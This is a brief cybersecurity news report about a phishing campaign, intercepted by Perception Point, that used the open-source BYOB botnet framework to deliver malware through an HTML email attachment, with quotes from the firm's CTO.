An attack leveraging the open-source Build Your Own Botnet (BYOB) framework has reportedly been intercepted by Israeli cybersecurity firm Perception Point’s incident response team. According to the team, this appears to be the first time the BYOB framework has been found to be used for fraudulent activity in the wild.
While these tactics and techniques have historically been limited in used to financially backed advanced persistent threat (APT) groups, they are now more easily accessed by novice criminals, in part because of the more widespread popularity of plug-and-play hacking kits, researchers said.
In July, a BYOB framework that implements all the building blocks needed to build a botnet was developed to improve cybersecurity defenses; however, what is used by defense can also fall into the hands of those with more malicious intentions. The continued growth of these hacking kits allows any script kiddie or malicious attacker to leverage this framework and carry out attacks that otherwise wouldn’t be possible.
According to the team’s email analysis, victims received an email with an HTML attachment containing both a link to a phishing site impersonating the Office 365 login page and script code that automatically downloaded malware to the victim’s computer. The payload then awaits command after connecting to the attackers server.
“The attack we intercepted was a targeted email attack against one of our clients. It was distributed via the email channel so the extent of it is to whomever the attacker chose to send it to. The nature of the tool [BYOB] used in the attack is mass remote control; therefore, we presume that this wasn't a single email sent, and we expect that others might have been compromised by this attack as well,” said Shlomi Levin, co-founder and CTO, Perception Point.
“The attack was easily prepared using the BYOB framework; hence, it doesn't cost the attacker much investment, so I would expect to see more BYOB used in the future.”